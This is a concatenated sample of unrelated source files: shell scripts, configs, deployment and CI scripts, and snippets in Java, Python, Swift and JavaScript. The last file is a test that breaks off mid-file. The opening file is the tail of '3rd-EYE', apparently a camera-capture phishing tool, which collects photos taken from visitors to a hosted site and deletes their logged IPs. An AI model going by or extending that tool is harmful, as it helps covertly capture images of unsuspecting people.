echo -e "\e[1;92m[\e[34m•\e[92m] Currency code: \e[0m$ccode\e[0m"
fi
echo ""
imgrcv
}
imgrcv() {
echo " "
echo -e "\e[1;93m[\e[0m\e[34m•\e[0m\e[1;93m] Waiting For Image...\e[0m\n"
while [ true ]; do
if [[ -e "webs/$site/Log.log" ]]; then
echo -e "\e[1;92m[\e[34m•\e[1;92m] Image Recieved..."
sleep 6.0
mv -f webs/$site/*.png /sdcard > /dev/null 2>&1
echo " "
echo -e "\e[1;92m[\e[34m•\e[1;92m]\e[1;34m Image Moved To Gallery..."
rm webs/$site/ip.txt > /dev/null 2>&1
rm webs/$site/Log.log > /dev/null 2>&1
echo
echo -e "\e[92m---------------------\e[34mCHECK YOUR GALLERY\e[92m----------------------\e[0m"
echo
checkfound
fi
done
}
about() {
clear
echo -e '\e[96m ----------------'
echo -e '\e[92m ┌─┐┌┐ ┌─┐┬ ┬┌┬┐
├─┤├┴┐│ ││ │ │
┴ ┴└─┘└─┘└─┘ ┴ '
echo -e '\e[96m ----------------'
echo -e '\e[96m |------------------|'
echo -e '\e[96m |'
echo -e '\e[96m |'
sleep 1.5
echo -e '\e[96m [\e[92m+\e[96m]-------[\e[92mDARKEAGLE\e[96m]'
echo -e '\e[96m |'
echo -e '\e[96m |'
sleep 1.0
echo -e '\e[96m [\e[92m+\e[96m]-------[\e[92mTOOL\e[96m]'
echo -e '\e[96m |'
echo -e '\e[96m |'
echo -e '\e[96m |'
sleep 2.0
echo -e '\e[96m [\e[92m+\e[96m]--------------'
echo -e '\e[96m |'
echo -e '\e[92m THIS TOOLS IS ONLY FOR EDUCATIONAL PURPOSE SO'
echo -e '\e[92m IM NOT RESPONSIBLE IF YOU DO ANY ILLEGAL THINGS'
echo -e '\e[92m THANKS FOR READING SUBSCRIBE {DARKNOOBHACKERS}'
echo -e '\e[92m HAVE A GOOD DAY BUDDIE :)'
echo -e '\e[96m |'
echo -e '\e[96m |'
sleep 4.5
echo -e '\e[96m [\e[92m+\e[96m]------------[\e[92mBYE\e[96m]\e[0m'
sleep 2.0
cd $HOME/3rd-EYE
clear
bash 3rd-EYE.sh
}
banner
menu
|
# append to history file, don't overwrite it
setopt appendhistory
# automatically cd to directories matching command names
setopt autocd
# treat #, -, and ^ as filename glob patterns
setopt extendedglob
# print an error if filename expansion fails, instead of leaving it as-is
setopt nomatch
# DIE, FOUL BELL
unsetopt beep
# use vim keybindings
bindkey -v
# enable Ctrl-R history search like emacs mode
bindkey '^R' history-incremental-search-backward
# make zsh vi bindings more like vim
# permit deleting backwards from insert point
bindkey "^?" backward-delete-char
# ctrl-w deletes previous word
bindkey "^W" backward-kill-word
# ctrl-h also deletes the previous char
bindkey "^H" backward-delete-char
# ctrl-u deletes an entire line
bindkey "^U" backward-kill-line
# Specify custom dotfiles ZSH completion path
fpath=(~/.config/zsh/completion $fpath)
# Activate zsh completions engine
autoload bashcompinit && bashcompinit
autoload -Uz compinit && compinit
complete -C '/apollo/env/AmazonAwsCli/bin/aws_completer' aws
# enable fzf
[ -f ~/.fzf.zsh ] && source ~/.fzf.zsh
|
#!/usr/bin/env bash
CURRENT_DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
online_option_string="@online_icon"
offline_option_string="@offline_icon"
ping_timeout_string="@ping_timeout"
route_to_ping_string="@route_to_ping"
online_icon_osx="✅ "
online_icon="✔"
offline_icon_osx="⛔️ "
offline_icon_cygwin="X"
offline_icon="❌ "
ping_timeout_default="3"
route_to_ping_default="www.google.com"
source $CURRENT_DIR/shared.sh
is_osx() {
[ $(uname) == "Darwin" ]
}
is_cygwin() {
[[ $(uname) =~ CYGWIN ]]
}
is_freebsd() {
[ $(uname) == FreeBSD ]
}
online_icon_default() {
if is_osx; then
echo "$online_icon_osx"
else
echo "$online_icon"
fi
}
offline_icon_default() {
if is_osx; then
echo "$offline_icon_osx"
elif is_cygwin; then
echo "$offline_icon_cygwin"
else
echo "$offline_icon"
fi
}
online_status() {
if is_osx || is_freebsd; then
local timeout_flag="-t"
else
local timeout_flag="-w"
fi
if is_cygwin; then
local number_pings_flag="-n"
else
local number_pings_flag="-c"
fi
local ping_timeout="$(get_tmux_option "$ping_timeout_string" "$ping_timeout_default")"
local ping_route="$(get_tmux_option "$route_to_ping_string" "$route_to_ping_default")"
ping "$number_pings_flag" 1 "$timeout_flag" "$ping_timeout" "$ping_route" >/dev/null 2>&1
}
print_icon() {
if $(online_status); then
printf "$(get_tmux_option "$online_option_string" "$(online_icon_default)")"
else
printf "$(get_tmux_option "$offline_option_string" "$(offline_icon_default)")"
fi
}
main() {
print_icon
}
main
|
#!/bin/sh
gpg --batch --use-agent --decrypt ~/.vault_key.gpg
|
/**
* Created by <EMAIL> on 2019/3/18.
*/
import "./style.less";
import React,{PureComponent} from 'react';
import extensionizer from 'extensionizer';
import popup from "../../../../../popup";
export default class More extends PureComponent{
constructor(props){
super(props);
}
render(){
const {locale,moreClass,onShowAccount,onRemove} = this.props;
const {app:{network},account:{current}} = this.props.state;
return (
<ul className={moreClass}>
<li>
<a onClick={()=>{
onShowAccount && onShowAccount();
}}>
<i className="fa icon-detail"/>
{locale.account_info}
</a>
</li>
{
network.explorer ?
<li>
<a onClick={()=>{
const url = `${network.explorer}/address/${current}?locale=${locale.key}`;
if(extensionizer.storage){
popup.messageToBackground("redirect",{url:url});
}
else{
window.open(url);
}
}}>
<i className="fa icon-copy-o"/>
{locale.view_from_youchain}
</a>
</li> : null
}
<li>
<a onClick={()=>{
onRemove && onRemove();
}}>
<i className="fa icon-delete"/>
{locale.account_remove}
</a>
</li>
</ul>
)
}
}
|
#!/bin/bash
# Copyright 2018 Datawire. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License
set -e -o pipefail
HERE=$(cd $(dirname $0); pwd)
cd "$HERE"
CLEAN_ON_SUCCESS=
if [ "$1" == "--cleanup" ]; then
CLEAN_ON_SUCCESS="--cleanup"
shift
fi
ROOT=$(cd ../..; pwd)
PATH="${ROOT}:${PATH}"
source ${ROOT}/utils.sh
check_rbac
initialize_namespace "008-cacert"
kubectl cluster-info
python ${ROOT}/yfix.py ${ROOT}/fixes/test-dep.yfix \
${ROOT}/ambassador-deployment.yaml \
k8s/ambassador-deployment.yaml \
008-cacert \
008-cacert
# create secrets for TLS stuff
kubectl create -n 008-cacert secret tls ambassador-certs --cert=certs/server.crt --key=certs/server.key
kubectl create -n 008-cacert secret generic ambassador-cacert --from-file=tls.crt=certs/client.crt
# --from-literal=cert_required=true
kubectl apply -f k8s/rbac.yaml
kubectl apply -f k8s/ambassador.yaml
kubectl apply -f k8s/ambassador-deployment.yaml
# kubectl run demotest -n 008-cacert --image=dwflynn/demotest:0.0.1 -- /bin/sh -c "sleep 3600"
set +e +o pipefail
wait_for_pods 008-cacert
CLUSTER=$(cluster_ip)
APORT=$(service_port ambassador 008-cacert)
# DEMOTEST_POD=$(demotest_pod)
BASEURL="https://${CLUSTER}:${APORT}"
echo "Base URL $BASEURL"
echo "Diag URL $BASEURL/ambassador/v0/diag/"
wait_for_ready "$BASEURL"
if ! check_diag "$BASEURL" 1 "no services but TLS"; then
exit 1
fi
if ! check_listeners "$BASEURL" 1 "no services but TLS"; then
exit 1
fi
if [ -n "$CLEAN_ON_SUCCESS" ]; then
drop_namespace 008-cacert
fi
|
#!/bin/sh
#
# Vivado(TM)
# runme.sh: a Vivado-generated Runs Script for UNIX
# Copyright 1986-2018 Xilinx, Inc. All Rights Reserved.
#
echo "This script was generated under a different operating system."
echo "Please update the PATH and LD_LIBRARY_PATH variables below, before executing this script"
exit
if [ -z "$PATH" ]; then
PATH=C:/Xilinx/SDK/2018.2/bin;C:/Xilinx/Vivado/2018.2/ids_lite/ISE/bin/nt64;C:/Xilinx/Vivado/2018.2/ids_lite/ISE/lib/nt64:C:/Xilinx/Vivado/2018.2/bin
else
PATH=C:/Xilinx/SDK/2018.2/bin;C:/Xilinx/Vivado/2018.2/ids_lite/ISE/bin/nt64;C:/Xilinx/Vivado/2018.2/ids_lite/ISE/lib/nt64:C:/Xilinx/Vivado/2018.2/bin:$PATH
fi
export PATH
if [ -z "$LD_LIBRARY_PATH" ]; then
LD_LIBRARY_PATH=
else
LD_LIBRARY_PATH=:$LD_LIBRARY_PATH
fi
export LD_LIBRARY_PATH
HD_PWD='C:/ECTE433_LabFiles/sampleRNN_GRU/sampleRNN_GRU.runs/impl_1'
cd "$HD_PWD"
HD_LOG=runme.log
/bin/touch $HD_LOG
ISEStep="./ISEWrap.sh"
EAStep()
{
$ISEStep $HD_LOG "$@" >> $HD_LOG 2>&1
if [ $? -ne 0 ]
then
exit
fi
}
# pre-commands:
/bin/touch .init_design.begin.rst
EAStep vivado -log sampleRNN_GRU_wrapper.vdi -applog -m64 -product Vivado -messageDb vivado.pb -mode batch -source sampleRNN_GRU_wrapper.tcl -notrace
|
#!/bin/bash
set -eou pipefail
DIR=$HOME/tempi_results
OUT=$DIR/measure_system.txt
set -x
mkdir -p $DIR
echo "" > $OUT
#MPIRUN="$HOME/software/mvapich2-2.3.4/bin/mpirun -n 2"
MPIRUN="$HOME/software/openmpi-4.0.5/bin/mpirun -n 2"
$MPIRUN ../../build/bin/measure-system | tee -a $OUT
|
#!/bin/bash
echo "
##############################################################################################################
#
# FortiGate Azure deployment using ARM Template
# Multi HUB - Fortigate Active/Passive cluster with Azure Route Server
#
##############################################################################################################
"
# Stop on error
set +e
if [ -z "$DEPLOY_LOCATION_A" ]
then
# Input location
echo -n "Enter HUB A location (e.g. westeurope): "
stty_orig=`stty -g` # save original terminal setting.
read locationa # read the location
stty $stty_orig # restore terminal setting.
if [ -z "$locationa" ]
then
locationa="westeurope"
fi
else
locationa="$DEPLOY_LOCATION_A"
fi
echo ""
echo "--> Deployment HUB A in '$locationa' location ..."
echo ""
if [ -z "$DEPLOY_LOCATION_B" ]
then
# Input location
echo -n "Enter HUB B location (e.g. eastus2): "
stty_orig=`stty -g` # save original terminal setting.
read locationb # read the location
stty $stty_orig # restore terminal setting.
if [ -z "$locationb" ]
then
locationb="eastus2"
fi
else
locationb="$DEPLOY_LOCATION_B"
fi
echo ""
echo "--> Deployment HUB B in '$locationb' location ..."
echo ""
if [ -z "$DEPLOY_PREFIX" ]
then
# Input prefix
echo -n "Enter prefix: "
stty_orig=`stty -g` # save original terminal setting.
read prefix # read the prefix
stty $stty_orig # restore terminal setting.
if [ -z "$prefix" ]
then
prefix="FORTI"
fi
else
prefix="$DEPLOY_PREFIX"
fi
echo ""
echo "--> Using prefix '$prefix' for all resources ..."
echo ""
rg="$prefix-RG"
if [ -z "$DEPLOY_USERNAME" ]
then
# Input username
echo -n "Enter username: "
stty_orig=`stty -g` # save original terminal setting.
read USERNAME # read the prefix
stty $stty_orig # restore terminal setting.
if [ -z "$USERNAME" ]
then
USERNAME="azureuser"
fi
else
USERNAME="$DEPLOY_USERNAME"
fi
echo ""
echo "--> Using username '$USERNAME' ..."
echo ""
if [ -z "$DEPLOY_PASSWORD" ]
then
# Input password
echo -n "Enter password: "
stty_orig=`stty -g` # save original terminal setting.
stty -echo # turn-off echoing.
read PASSWORD # read the password
stty $stty_orig # restore terminal setting.
else
PASSWORD="$DEPLOY_PASSWORD"
echo ""
echo "--> Using password found in env variable DEPLOY_PASSWORD ..."
echo ""
fi
# Create resource group
echo ""
echo "--> Creating $rg resource group ..."
az group create --location "$locationa" --name "$rg"
# Validate template
echo "--> Validation deployment in $rg resource group ..."
az deployment group validate --resource-group "$rg" \
--template-file azuredeploy.json \
--parameters adminUsername="$USERNAME" adminPassword="$PASSWORD" fortiGateNamePrefix=$prefix \
hubALocation="$locationa" hubBLocation="$locationb"
result=$?
if [ $result != 0 ];
then
echo "--> Validation failed ..."
exit $result;
fi
# Deploy resources
echo "--> Deployment of $rg resources ..."
az deployment group create --resource-group "$rg" \
--template-file azuredeploy.json \
--parameters adminUsername="$USERNAME" adminPassword="$PASSWORD" fortiGateNamePrefix=$prefix \
hubALocation="$locationa" hubBLocation="$locationb"
result=$?
if [[ $result != 0 ]];
then
echo "--> Deployment failed ..."
exit $result;
else
echo "
##############################################################################################################
#
# FortiGate Azure deployment using ARM Template
# Fortigate Active/Passive cluster with Azure Route Server
#
# The FortiGate systems is reachable via the management public IP addresses of the firewall
# on HTTPS/443 and SSH/22.
#
##############################################################################################################
Deployment information:
Username: $USERNAME
FortiGate IP addesses
"
query="[?virtualMachine.name.starts_with(@, '$prefix')].{virtualMachine:virtualMachine.name, publicIP:virtualMachine.network.publicIpAddresses[0].ipAddress,privateIP:virtualMachine.network.privateIpAddresses[0]}"
az vm list-ip-addresses --query "$query" --output tsv
echo "
IP Public Azure Load Balancer:"
publicIpIds=$(az network lb show -g "$rg" -n "$prefix-ExternalLoadBalancer" --query "frontendIpConfigurations[].publicIpAddress.id" --out tsv)
while read publicIpId; do
az network public-ip show --ids "$publicIpId" --query "{ ipAddress: ipAddress, fqdn: dnsSettings.fqdn }" --out tsv
done <<< "$publicIpIds"
echo "
##############################################################################################################
"
fi
exit 0
|
<reponame>DinhLantstk789/codelibrary<filename>java/structures/DisjointSetsRank.java
package structures;
public class DisjointSetsRank {
int[] p;
int[] rank;
public DisjointSetsRank(int size) {
p = new int[size];
for (int i = 0; i < size; i++)
p[i] = i;
rank = new int[size];
}
public int root(int x) {
return x == p[x] ? x : (p[x] = root(p[x]));
}
public void unite(int a, int b) {
a = root(a);
b = root(b);
if (a == b)
return;
if (rank[a] < rank[b]) {
p[a] = b;
} else {
p[b] = a;
if (rank[a] == rank[b])
++rank[a];
}
}
public static void main(String[] args) {
DisjointSetsRank ds = new DisjointSetsRank(10);
System.out.println(false == (ds.root(0) == ds.root(9)));
ds.unite(0, 9);
System.out.println(true == (ds.root(0) == ds.root(9)));
}
}
|
#! /bin/bash
# This script is used by cloud build to push Docker images into Docker hub
tag_and_push() {
tag=$1
docker tag gcr.io/$PROJECT_ID/graph-node:$SHORT_SHA \
graphprotocol/graph-node:$tag
docker push graphprotocol/graph-node:$tag
docker tag gcr.io/$PROJECT_ID/graph-node-debug:$SHORT_SHA \
graphprotocol/graph-node-debug:$tag
docker push graphprotocol/graph-node-debug:$tag
}
echo "Logging into Docker Hub"
echo $PASSWORD | docker login --username="$DOCKER_HUB_USER" --password-stdin
set -ex
tag_and_push "$SHORT_SHA"
# Builds of tags set the tag in Docker Hub, too
[ -n "$TAG_NAME" ] && tag_and_push "$TAG_NAME"
# Builds for tags vN.N.N become the 'latest'
[[ "$TAG_NAME" =~ ^v[0-9]+\.[0-9]+\.[0-9]+$ ]] && tag_and_push latest
exit 0
|
import os
class CustomLogger:
def __init__(self, out_dir, render, filename_header):
self.out_dir = out_dir
self.render = render
self.filename_header = filename_header
self.log_file = os.path.join(out_dir, f"{filename_header}_log.txt")
def on_reset(self, obs, image_frame):
with open(self.log_file, 'a') as file:
file.write("Reset event logged\n")
if obs is not None:
file.write(f"Obs: {obs}\n")
file.write(f"Image frame: {image_frame}\n")
if self.render:
print("Rendering environment for reset event")
def on_step(self, action):
with open(self.log_file, 'a') as file:
file.write(f"Step event logged - Action: {action}\n")
if self.render:
print("Rendering environment for step event")
# Demonstration of usage
out_dir = "logs"
render = True
filename_header = "custom"
logger = CustomLogger(out_dir=out_dir, render=render, filename_header=filename_header)
logger.on_reset(obs=None, image_frame="Generated image frame 1")
for i in range(1, 6):
logger.on_step(action=i) |
import os
import sys
import argparse
import csv
def extract_built_residues(pdb_file):
# Implement the logic to extract information about the built residues from the PDB file
# Return a list of dictionaries, where each dictionary represents information about a built residue
def generate_csv_report(pdb_files):
for pdb_file in pdb_files:
built_residues = extract_built_residues(pdb_file)
csv_file_name = os.path.splitext(pdb_file)[0] + '_report.csv'
with open(csv_file_name, 'w', newline='') as csvfile:
fieldnames = ['PDB File', 'Residue Name', 'Residue Number'] # Add more fields as needed
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
for residue in built_residues:
writer.writerow({'PDB File': pdb_file, 'Residue Name': residue['name'], 'Residue Number': residue['number']}) # Update with actual keys and values
def main():
progname = os.path.basename(sys.argv[0])
usage = progname + """ [options] <pdbs>
Given pdb files, report the built residues in csv files.
"""
args_def = {}
parser = argparse.ArgumentParser()
parser.add_argument("pdb", nargs='*', help="specify pdbs to be processed")
args = parser.parse_args()
if len(sys.argv) == 1:
print("usage: " + usage)
else:
generate_csv_report(args.pdb)
if __name__ == "__main__":
main() |
#!/bin/ksh
# Description :
# A simple script to update the local(gif) tunnel with the new WAN IP
# and also update HE(tunnelbroker) with the new end point IP
# This also depends on a line in /etc/rc.local :
# "/sbin/ifconfig ix0 | grep inet | cut -c 7-21 | xargs > /tmp/.wan-ip"
# where ix0 is my WAN interface
### Variables that must be set ###
###
# HE tunnel endpoint
HE_tunnel_end=""
# HE username
HE_user_name=""
# HE update key
HE_update_key=""
# HE tunnel ID
HE_tunnel_id=""
# Local WAN interface
wan_interface=""
# Local interface for tunnel
tunnel_interface=""
###
### End variables ###
# WAN IP on system boot
wan_ip=`cat /tmp/.wan-ip`
# Current WAN IP from adaptor
ifconfig $wan_interface | grep inet | cut -c 7-21 | xargs > /tmp/ip
current_wan_ip=`cat /tmp/ip`
# Check to see if the WAN IP has changed
ip_diff_check=`diff -s /tmp/.wan-ip /tmp/ip`
returncode_ip_diff_check=`echo $?`
# If changed, then update the tunnel and update HE, if no change exit and log msg to syslog
if [ $returncode_ip_diff_check != 0 ]; then
sed -i "1 s/^.*$/tunnel $current_wan_ip $HE_tunnel_end/g" /etc/hostname.$tunnel_interface
/bin/sh /etc/netstart $tunnel_interface
curl -s "https://$HE_user_name:$HE_update_key@ipv4.tunnelbroker.net/nic/update?hostname=$HE_tunnel_id"
logger "Updated HE tunnel with new local IP $current_wan_ip"
mv /tmp/ip /tmp/.wan-ip
else
logger "No update needed for HE IPV6 tunnel"
exit 0
fi
|
#!/bin/bash
# Copyright 2021 The Kubernetes Authors All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
set -x -o pipefail
# Make sure docker is installed and configured
./hack/jenkins/installers/check_install_docker.sh
yes|gcloud auth configure-docker
docker login -u ${DOCKERHUB_USER} -p ${DOCKERHUB_PASS}
# Make sure gh is installed and configured
./hack/jenkins/installers/check_install_gh.sh
# Let's make sure we have the newest kicbase reference
curl -L https://github.com/kubernetes/minikube/raw/master/pkg/drivers/kic/types.go --output types-head.go
# kicbase tags are of the form VERSION-TIMESTAMP-PR, so this grep finds that TIMESTAMP in the middle
# if it doesn't exist, it will just return VERSION, which is covered in the if statement below
HEAD_KIC_TIMESTAMP=$(egrep "Version =" types-head.go | cut -d \" -f 2 | cut -d "-" -f 2)
CURRENT_KIC_TS=$(egrep "Version =" pkg/drivers/kic/types.go | cut -d \" -f 2 | cut -d "-" -f 2)
if [[ $HEAD_KIC_TIMESTAMP != v* ]]; then
diff=$((CURRENT_KIC_TS-HEAD_KIC_TIMESTAMP))
if [[ $CURRENT_KIC_TS == v* ]] || [ $diff -lt 0 ]; then
gh pr comment ${ghprbPullId} --body "Hi ${ghprbPullAuthorLoginMention}, your kicbase info is out of date. Please rebase."
exit 1
fi
fi
rm types-head.go
# Setup variables
if [[ -z $KIC_VERSION ]]; then
# Testing PRs here
release=false
now=$(date +%s)
KV=$(egrep "Version =" pkg/drivers/kic/types.go | cut -d \" -f 2 | cut -d "-" -f 1)
GCR_REPO=gcr.io/k8s-minikube/kicbase-builds
DH_REPO=docker.io/kicbase/build
export KIC_VERSION=$KV-$now-$ghprbPullId
else
# Actual kicbase release here
release=true
GCR_REPO=${GCR_REPO:-gcr.io/k8s-minikube/kicbase}
DH_REPO=${DH_REPO:-docker.io/kicbase/stable}
export KIC_VERSION
fi
GCR_IMG=${GCR_REPO}:${KIC_VERSION}
DH_IMG=${DH_REPO}:${KIC_VERSION}
export KICBASE_IMAGE_REGISTRIES="${GCR_IMG} ${DH_IMG}"
# Build a new kicbase image
CIBUILD=yes make push-kic-base-image | tee kic-logs.txt
# Abort with error message if above command failed
ec=$?
if [ $ec -gt 0 ]; then
if [ "$release" = false ]; then
gh pr comment ${ghprbPullId} --body "Hi ${ghprbPullAuthorLoginMention}, building a new kicbase image failed.
See the logs at: https://storage.cloud.google.com/minikube-builds/logs/${ghprbPullId}/${ghprbActualCommit::7}/kic_image_build.txt
"
fi
exit $ec
fi
# Retrieve the sha from the new image
docker pull $GCR_IMG
fullsha=$(docker inspect --format='{{index .RepoDigests 0}}' $GCR_IMG)
sha=$(echo ${fullsha} | cut -d ":" -f 2)
git config user.name "minikube-bot"
git config user.email "minikube-bot@google.com"
if [ "$release" = false ]; then
# Update the user's PR with the newly built kicbase image.
git remote add ${ghprbPullAuthorLogin} git@github.com:${ghprbPullAuthorLogin}/minikube.git
git fetch ${ghprbPullAuthorLogin}
git checkout -b ${ghprbPullAuthorLogin}-${ghprbSourceBranch} ${ghprbPullAuthorLogin}/${ghprbSourceBranch}
sed -i "s|Version = .*|Version = \"${KIC_VERSION}\"|;s|baseImageSHA = .*|baseImageSHA = \"${sha}\"|;s|gcrRepo = .*|gcrRepo = \"${GCR_REPO}\"|;s|dockerhubRepo = .*|dockerhubRepo = \"${DH_REPO}\"|" pkg/drivers/kic/types.go; make generate-docs;
git commit -am "Updating kicbase image to ${KIC_VERSION}"
git push ${ghprbPullAuthorLogin} HEAD:${ghprbSourceBranch}
message="Hi ${ghprbPullAuthorLoginMention}, we have updated your PR with the reference to newly built kicbase image. Pull the changes locally if you want to test with them or update your PR further."
if [ $? -gt 0 ]; then
message="Hi ${ghprbPullAuthorLoginMention}, we failed to push the reference to the kicbase to your PR. Please run the following command and push manually.
sed -i 's|Version = .*|Version = \"${KIC_VERSION}\"|;s|baseImageSHA = .*|baseImageSHA = \"${sha}\"|;s|gcrRepo = .*|gcrRepo = \"${GCR_REPO}\"|;s|dockerhubRepo = .*|dockerhubRepo = \"${DH_REPO}\"|' pkg/drivers/kic/types.go
"
fi
gh pr comment ${ghprbPullId} --body "${message}"
else
# We're releasing, so open a new PR with the newly released kicbase
branch=kicbase-release-${KIC_VERSION}
git checkout -b ${branch}
sed -i "s|Version = .*|Version = \"${KIC_VERSION}\"|;s|baseImageSHA = .*|baseImageSHA = \"${sha}\"|;s|gcrRepo = .*|gcrRepo = \"${GCR_REPO}\"|;s|dockerhubRepo = .*|dockerhubRepo = \"${DH_REPO}\"|" pkg/drivers/kic/types.go
make generate-docs
git add pkg/drivers/kic/types.go site/content/en/docs/commands/start.md
git commit -m "Update kicbase to ${KIC_VERSION}"
git remote add minikube-bot git@github.com:minikube-bot/minikube.git
git push -f minikube-bot ${branch}
gh pr create --fill --base master --head minikube-bot:${branch}
fi
|
import UIKit
class CustomDrawingViewController: UIViewController {
let rectanglePopoverParent = UIView()
let leftToolbarParent = UIView()
let rectangleButton = UIButton()
let rectanglePopoverToolbar = UIStackView()
override func viewDidLoad() {
super.viewDidLoad()
// Create and position popover menu relative to the main toolbar
let leadingConstraint = rectanglePopoverParent.leadingAnchor.constraint(equalTo: leftToolbarParent.trailingAnchor, constant: 2)
let topConstraint = rectanglePopoverParent.topAnchor.constraint(equalTo: rectangleButton.topAnchor, constant: 0)
let widthConstraint = rectanglePopoverParent.widthAnchor.constraint(equalTo: leftToolbarParent.widthAnchor, constant: 0)
let heightConstraint = rectanglePopoverParent.heightAnchor.constraint(equalTo: rectangleButton.heightAnchor, multiplier: 2)
NSLayoutConstraint.activate([leadingConstraint, topConstraint, widthConstraint, heightConstraint])
// Set the axis and distribution of the toolbar
rectanglePopoverToolbar.axis = .vertical
rectanglePopoverToolbar.distribution = .fillEqually
// Add tap gesture recognizer to the toolbar
let tapGesture = UITapGestureRecognizer(target: self, action: #selector(rectanglePopoverTapHandler(gesture:)))
tapGesture.cancelsTouchesInView = false
rectanglePopoverToolbar.addGestureRecognizer(tapGesture)
// Create a button with an image for a filled rectangle
let rectangleFilledImage = UIImage(named: "RectangleFilled.pdf")
let rectangleFilledButton = UIButton()
rectangleFilledButton.setImage(rectangleFilledImage, for: .normal)
}
@objc func rectanglePopoverTapHandler(gesture: UITapGestureRecognizer) {
// Handle tap gesture for selecting drawing tools
}
} |
#!/bin/bash
# SPDX-license-identifier: Apache-2.0
##############################################################################
# Copyright (c) 2019
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Apache License, Version 2.0
# which accompanies this distribution, and is available at
# http://www.apache.org/licenses/LICENSE-2.0
##############################################################################
set -o nounset
set -o errexit
set -o pipefail
function info {
_print_msg "INFO" "$1"
}
function error {
_print_msg "ERROR" "$1"
exit 1
}
function _print_msg {
echo "$1: $2"
}
info "Validating skopeo installation..."
if ! command -v skopeo; then
error "skopeo command line wasn't installed"
fi
|
//
// Created by ooooo on 2019/12/5.
//
#ifndef CPP_0338_SOLUTION1_H
#define CPP_0338_SOLUTION1_H
#include <iostream>
#include <vector>
using namespace std;
class Solution {
public:
vector<int> countBits(int num) {
vector<int> res = vector<int>(num + 1, 0);
for (int i = 1; i <= num; i++) {
int n = i;
int count = 0;
while (n) {
count++;
n &= n - 1;
}
res[i] = count;
}
return res;
}
};
#endif //CPP_0338_SOLUTION1_H
|
<filename>frontend/src/actions/events-search.spec.js
import 'babel-polyfill'
import Mappersmith from 'mappersmith'
import 'mappersmith/fixtures'
import configureMockStore from 'redux-mock-store'
import thunk from 'redux-thunk'
import { EVENTS_SEARCH_LIMIT } from 'api'
const middlewares = [ thunk ]
const mockStore = configureMockStore(middlewares)
import {
TRIGGER_EVENTS_SEARCH,
REQUEST_EVENTS_SEARCH_RESULTS,
RECEIVE_EVENTS_SEARCH_RESULTS,
REQUEST_EVENTS_SEARCH_RESULTS_FAILED,
ADD_FLASH_MESSAGE,
LOAD_MORE_EVENTS_SEARCH_RESULTS
} from 'actions'
import {
triggerSearch,
fetchSearchResults,
loadMoreSearchResults
} from 'actions/events-search'
beforeEach(() => {
Mappersmith.Env.Fixture.clear()
})
describe('actions/event-search', () => {
describe('#fetchSearchResults', () => {
describe('without filters', () => {
let event, initialState, store
beforeEach(() => {
initialState = { eventsFilters: {}, xhrStatus: { currentEventsOffset: 0 } }
store = mockStore(initialState)
event = { id: 1 }
Mappersmith.Env.Fixture
.define('get')
.matching({ url: `/api/v1/events?limit=${EVENTS_SEARCH_LIMIT}&offset=0` })
.response([event])
})
it('creates REQUEST and RECEIVE actions', (done) => {
store.dispatch(fetchSearchResults(event)).then(() => {
const actions = store.getActions()
expect(actions[0]).toEqual({ type: REQUEST_EVENTS_SEARCH_RESULTS })
expect(actions[1]).toEqual({ type: RECEIVE_EVENTS_SEARCH_RESULTS, events: [event], offset: 0 })
done()
})
.catch((e) => done.fail(`test failed with promise error: ${e.message}`))
})
})
describe('with specific filters', () => {
let event, initialState, store
beforeEach(() => {
initialState = {
eventsFilters: { type: 'event_type', value: 'new' },
xhrStatus: { currentEventsOffset: 0 }
}
store = mockStore(initialState)
event = { id: 1 }
Mappersmith.Env.Fixture
.define('get')
.matching({ url: `/api/v1/events?limit=${EVENTS_SEARCH_LIMIT}&event_type=new&offset=0` })
.response([event])
})
it('creates REQUEST and RECEIVE actions using the filters', (done) => {
store.dispatch(fetchSearchResults(event)).then(() => {
const actions = store.getActions()
expect(actions[0]).toEqual({ type: REQUEST_EVENTS_SEARCH_RESULTS })
expect(actions[1]).toEqual({ type: RECEIVE_EVENTS_SEARCH_RESULTS, events: [event], offset: 0 })
done()
})
.catch((e) => done.fail(`test failed with promise error: ${e.message}`))
})
})
describe('with a different offset', () => {
let event, initialState, store
beforeEach(() => {
initialState = {
eventsFilters: { },
xhrStatus: { currentEventsOffset: 4 }
}
store = mockStore(initialState)
event = { id: 1 }
Mappersmith.Env.Fixture
.define('get')
.matching({ url: `/api/v1/events?limit=${EVENTS_SEARCH_LIMIT}&offset=4` })
.response([event])
})
it('creates REQUEST and RECEIVE actions pointing to the correct offset', (done) => {
store.dispatch(fetchSearchResults(event)).then(() => {
const actions = store.getActions()
expect(actions[0]).toEqual({ type: REQUEST_EVENTS_SEARCH_RESULTS })
expect(actions[1]).toEqual({ type: RECEIVE_EVENTS_SEARCH_RESULTS, events: [event], offset: 4 })
done()
})
.catch((e) => done.fail(`test failed with promise error: ${e.message}`))
})
})
describe('when it fails', () => {
let event, initialState, store
beforeEach(() => {
initialState = { eventsFilters: {}, xhrStatus: { currentEventsOffset: 0 } }
store = mockStore(initialState)
event = { id: 1 }
Mappersmith.Env.Fixture
.define('get')
.matching({ url: `/api/v1/events?limit=${EVENTS_SEARCH_LIMIT}&offset=0` })
.failure()
.response({
responseText: JSON.stringify({
error: true,
message: 'some error'
})
})
})
it('creates REQUEST and RECEIVE actions pointing to the correct offset', (done) => {
store.dispatch(fetchSearchResults(event)).then(() => {
const actions = store.getActions()
expect(actions[0]).toEqual({ type: REQUEST_EVENTS_SEARCH_RESULTS })
expect(actions[1]).toEqual({
type: REQUEST_EVENTS_SEARCH_RESULTS_FAILED,
query: { offset: 0 }, error: 'some error'
})
expect(actions[2]).toEqual({
type: ADD_FLASH_MESSAGE,
